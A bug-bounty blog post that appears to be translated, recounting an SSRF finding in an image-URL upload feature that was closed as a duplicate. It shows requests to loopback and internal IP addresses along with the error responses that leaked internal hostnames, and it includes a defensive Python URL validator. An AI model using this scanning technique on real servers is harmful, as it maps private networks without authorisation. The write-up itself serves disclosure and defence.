
[hackerone] - A bug bounty report that was far too late

Universe7202 2020. 8. 17. 23:29

Title: Internal Ports Scanning and IPs Scanning via SSRF

Weakness: SSRF

The report I submitted this time is an SSRF vulnerability.

With an SSRF attack, internal IPs or ports can be scanned.

The site has a feature to upload an image, or to enter an image URL so that the server fetches that image.

Just in case, I entered http://127.0.0.1, and the result below was printed.

[127.0.0.1]: Image could not be downloaded (curl error: 56; Received HTTP code 503 from proxy after CONNECT)

Looking at the error, it sent a request to 127.0.0.1 and received a 503....

In other words, an SSRF attack is possible.

To scan ports, I sent requests based on well-known ports, but the results were not much help.

>> https://127.0.0.1:0
{"data":{"error":{"code":1011,"message":"[127.0.0.1:0]: Invalid URL (https:\/\/127.0.0.1:0)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":400}
>> https://127.0.0.1:1
{"data":{"error":{"code":2011,"message":"[127.0.0.1:1]: Image could not be downloaded (curl error: 56; Received HTTP code 403 from proxy after CONNECT)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://127.0.0.1:7
{"data":{"error":{"code":2011,"message":"[127.0.0.1:7]: Image could not be downloaded (curl error: 56; Received HTTP code 403 from proxy after CONNECT)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://127.0.0.1:9
{"data":{"error":{"code":2011,"message":"[127.0.0.1:9]: Image could not be downloaded (curl error: 56; Received HTTP code 403 from proxy after CONNECT)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
...
...
>> https://127.0.0.1:443
{"data":{"error":{"code":2011,"message":"[127.0.0.1:443]: Image could not be downloaded (curl error: 56; Received HTTP code 503 from proxy after CONNECT)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
...

I gave up on port scanning and entered only internal IPs to see what results would be printed.

First I sent requests across the `192.168.0.0/24` range, and unlike the above, a `time out` shows up.

>> https://192.168.0.128
{"data":{"error":{"code":2011,"message":"[192.168.0.128]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://192.168.0.64
{"data":{"error":{"code":2011,"message":"[192.168.0.64]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://192.168.0.32
{"data":{"error":{"code":2011,"message":"[192.168.0.32]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://192.168.0.192
{"data":{"error":{"code":2011,"message":"[192.168.0.192]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://192.168.0.1
{"data":{"error":{"code":2011,"message":"[192.168.0.1]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}

When I sent requests to the `172.16.0.0/24` range, some useful information was printed.

Some internal IPs each had their own internal domain, and you can see the domain names being printed.

>> https://172.16.0.163
[172.16.0.163]: Image could not be downloaded (curl error: 51; SSL: certificate subject name 'larynx.domain-name.com' does not match target host name '172.16.0.163')

>> https://172.16.0.131
[172.16.0.131]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.131')

>> https://172.16.0.132
[172.16.0.132]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.132')

>> https://172.16.0.135
[172.16.0.135]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.135')

>> https://172.16.0.102
[172.16.0.102]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.102')

>> https://172.16.0.8
[172.16.0.8]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.8')

>> https://172.16.0.12
[172.16.0.12]: Image could not be downloaded (curl error: 51; SSL: certificate subject name 'browserevents.domain-name.com' does not match target host name '172.16.0.12')

>> https://172.16.0.109
[172.16.0.109]: Image could not be downloaded (curl error: 56; Received HTTP code 503 from proxy after CONNECT)

>> https://172.16.0.45
[172.16.0.45]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.45')

>> https://172.16.0.176
[172.16.0.176]: Image could not be downloaded (curl error: 51; SSL: certificate subject name 'monitor.production.domain-name-ops.com' does not match target host name '172.16.0.176')

>> https://172.16.0.117
[172.16.0.117]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.117')

>> https://172.16.0.155
[172.16.0.155]: Image could not be downloaded (curl error: 28; Operation timed out after 0 milliseconds with 0 out of 0 bytes received)

>> https://172.16.0.158
[172.16.0.158]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.158')

Since the site is vulnerable to SSRF, I wondered what results I could get by sending requests with the internal domains written in...

I wanted to at least see an image from that internal network, but nothing came out..

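From the defender's side, the fix for this class of bug is to validate the user-supplied URL before the server fetches it, and to keep the fetcher's own error text out of the response. The following Python is an added example, not the reported site's code; the allow-list policy, the hostnames and the injectable resolver are constructed assumptions.

```python
import ipaddress
import re
import socket
from urllib.parse import urlparse

# Constructed policy for a "fetch image by URL" feature (hypothetical, not the reported site's code).
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def _is_public(addr: str) -> bool:
    """True only for globally routable unicast addresses: rejects 127/8, 10/8, 172.16/12,
    192.168/16, link-local 169.254/16 (cloud metadata), unspecified and multicast."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return ip.is_global and not ip.is_multicast


def validate_fetch_url(url: str, resolver=socket.getaddrinfo) -> tuple[bool, str]:
    """Return (ok, reason). The resolver is injectable so the check can run offline in tests."""
    try:
        parts = urlparse(url)
        port = parts.port  # raises ValueError for non-numeric or out-of-range ports
    except ValueError:
        return False, "unparseable URL or port"
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False, "scheme or host not allowed"
    if port is None:  # not `port or default`: an explicit :0 must stay 0 and be rejected below
        port = 443 if parts.scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, "port not allowed"
    try:
        infos = resolver(parts.hostname, port, proto=socket.IPPROTO_TCP)
    except OSError:  # socket.gaierror is a subclass of OSError
        return False, "host does not resolve"
    addrs = {info[4][0] for info in infos}
    # Every address in the answer must be public; a mixed answer is rejected as a whole.
    if not addrs or not all(_is_public(a) for a in addrs):
        return False, "host resolves to a non-public address"
    return True, "ok"


def split_fetch_error(fetcher_message: str) -> tuple[str, str]:
    """Return (client_message, log_detail). The curl detail goes to server-side logs only;
    in the responses above it carried proxy status codes and TLS certificate subject names."""
    detail = re.search(r"\(curl error: [^)]*\)", fetcher_message)
    return "Image could not be downloaded", (detail.group(0) if detail else fetcher_message)
```

Redirects must be re-validated with the same check, and the fetch should connect to the address that was validated rather than resolving the hostname a second time, otherwise a DNS answer that changes between the check and the fetch bypasses it.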
So, since the SSRF vulnerability exists anyway, I reported it to hackerone, and a BOT told me to wait since they would contact me later.

But a few hours later someone left a comment, and when I read it.... someone had already reported the exact same vulnerability...

The comment author shared the report with me, and reading it, someone had already reported it 3 years ago.

The funny thing is that, apart from me, more than 10 people had submitted the same report, and the comments said things like "It's been 3 years, why haven't you fixed it yet, aren't other people wasting their time?"..

The conclusion is that the report I submitted was handled as a duplicate.

Anyway... let's be satisfied just with having found a vulnerability like this in the real world...